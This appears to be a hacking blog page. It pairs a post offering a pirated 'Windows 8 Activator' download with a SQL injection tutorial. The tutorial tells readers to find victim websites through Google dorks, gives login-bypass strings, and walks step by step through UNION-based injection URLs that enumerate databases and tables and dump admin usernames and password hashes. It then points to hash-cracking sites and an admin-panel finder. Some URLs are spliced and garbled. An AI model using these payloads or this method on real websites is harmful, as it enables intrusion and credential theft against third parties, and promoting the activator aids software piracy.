Windows 8 Activator Final

Hi after alon time i am back again guys with Windows 8 Activator for you with all new features within it and its a updates one and its cool now you can unlock maximum things with this and after activating with this you can unlock Personalization,,Start screen,,Account Picture and many more and this is a updated activator and its cool with its feature and i hope you like it.

Windows 8 New Features: 

Language & standard support

Windows store

Shell & user Interface

File Explorer

Task Manager

User Login

Microsoft Account Integration

Multi-monitor Support

Shorter boot times

USB 3.0

Video sub System

Windows 2 go

Hyper-V

Family Safety

ARM Architecture

Boot Security

File History

Refresh & Reset

Virtual Hardisk Format 

Storage Spaces 

NOTE: Please uninstall the Previous Activator & then Run it.

Download from Exabit

Enjoy this stuff..!! Have a nice Day.

We hope you are stastified with our blog & if there is any problem please fell free to ask..!

Basic SQL Injection Tutorial

What is SQL injection?
SQL injection is used to exploit and extract data from website.Using SQL injection attacker can extract data like Admin login information,credit cards details,emails,phone no,address,name etc.
SQL - Structured Query Language
SQL is a programming language use to communicate and manage database.
If this doesn't satisfy your curiosity then here's a link to Wikipedia.

let's start a real stuff...!!

Finding Vulnerable Website Using Dorks
Dorks list -- by SideSwipe.
Just copy one Dork for eg- inurl:index.php?id= and Google it.


Gaining Access to Administrator Account Using Quries
inurl:admin.php Search it using Google.Choose any of the Dork Listed in the search Result by Google.
' or 'x'='x use this in admin and password boxes.
Username:' or 'x'='x
Password:' or 'x'='x 

you can also try following queries:
') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'

Normal/UNION Based SQL Injection 

Checking Vulnerability

Target: 

http://www.targetsite.com/pages.php?id=2 

Add ' (apostrophe) at the end of link 

http://www.targetsite.com/pages.php?id=2'  

following error will occur:

You have an error in your SQL syntax;check the manual corresponds to your MySQL server version  for the right syntax to use near '\" at line 1

If website loaded as it is without error or unharmed then website is not vulnerable to SQL injection.If it gives error we can move further otherwise you can select another website.

Finding Number Of Columns

http://www.targetsite.com/pages.php?id=2+order+by+1--  NO ERROR
http://www.targetsite.com/pages.php?id=2+order+by+2--  NO ERROR
http://www.targetsite.com/pages.php?id=2+order+by+3--  NO ERROR
http://www.targetsite.com/pages.php?id=2+order+by+4--  NO ERROR
http://www./pages.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--  .com/pages.php?id=2+order+by+5--  NO ERROR  

Keep increasing number till we get an error.
Don't forget to add --(two hypen) at the end of link. 

http://www.targetsite.com/pages.php?id=2+order+by+15--  ERROR 

finally we got error at order+by+15--. It means that our website contain 14 columns.

Determining Vulnerable Columns

http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--   

OR

http://www.targetsite.com/pages.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--  

Don't forget to add - (hyphen) after id= . If you are using id=null+union+select.. then there is no need to add -(hyphen) after id= 

It will display vulnerable columns.It displays column number 4 is vulnerable.
we will use vulnerable column to extract data from website.

Determining Mysql Version

It is easy to find Mysql version.Replace vulnerable column with

@@version 

OR

version() 

we got column number 4 vulnerable so we will replace column number 4 with @@version.

http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14-- 

We got mysql version

5.1.61-community-log

If you got mysql version less than 5 then you have to use error based SQL injection.I am not going to explain error based SQL injection.so leave that website and choose another.let's move further..

Finding Database

http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14+from+inf ​ormation_schema.schemata-- 

information_schema contains metadata.Metadata is data about other data such as tables and columns.
information_schema.schemata contains name of all databases.
we got names of database information_schema,site_target

Finding Tables

http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14+
from+information_schema.tables+where+table_schema=database()--  

This will display tables. 
 It is not in proper manner.we need to bring them in proper manner so we can observe them clearly.
just add 0x0a after table_name
0x0a means new line.

http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,group_concat(table_name,0x0a),5,6,7,8,9,10,11,12,13,14+
from+information_schema.tables+where+table_schema=database()-- 
Don't forget to add , between 0x0a and table_name

we got following tables:  
tblgroup
,tblimages
,tblmaincategory
,tbloption
,tbloptionname
,tblorderdetails
,tblorders
,tblpage
,tblpagename
,tblpics
,tblproducts
,tblrelated
,tblsitemap
,tblstate
,tblsubcategory
,tbltemp
,tbltempoption
,tbltempoptionname
,tbltemppics
,tblusers
our goal is to get admin username and password.so we are going to extract columns from tblusers.
 Finding Columns
www.targetsite.com/pages.php?id=-2+union+select+1,2,3,group_concat(column_name,0x0a),5,6,7,8,9,10,11,12,13,14+
from+information_schema.columns+where+table_name=char(116,98,108,117,115,101,114​,115)-- 
we need to convert our table name into ASCII value.
String - ASCII, HEX, Binary Converter
we got columns from tblusers.

UserId,UserName,UserPwd  
 Extracting Data From Columns
http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,group_concat(UserId,0x3a,UserName,0x3a,UserPwd,0x0a),5,6,7,8,9,10,11,12,13,14+from+tblusers--  10,11,12,13,14+from+tblusers-- 
here 0x3a separates UserId,UserName,UserPwd from each other.0x3a is converted into : (colon).

3:samplehash:1b4ea4c5cc5181229340c1c188baad6f
,4:samplehash:27b811b22de87faa7925ae3c2a0337fe
,19:samplehash:416947dc3ddd5871659ee142273ffa95
:0,20:samplehash:043d9d7cd5afa18257b77164bc91205e
Finally we got usernames and passwords.
password are not in plain text they are in encrypted form.we need to decrypt them.

Admin Login Page:
http://www.targetsite.com/admin/index.php

Cracking Hashes
·  http://www.md5decrypter.co.uk
·  http://www.md5crack.com/

Finding Admin Login Page
Online Admin login panel finder
Perl Script
Requirements:
Download ActivePerl and install
Admins.pl
open CMD and navigate to admins.pl or simply double click on admins.pl file.
now enter name of your targeted site and press enter
eg:http://www.targetsite.com
type coding language of your website such as php,asp.If you don't know coding language then type any and press enter It will begin scanning for Admin Control Panel.
 
    Thank you for reading tutorial.
Please post comments and let me know how was tutorial. This TUT is the result of my friends hardwork & credits goes to Mst. Suved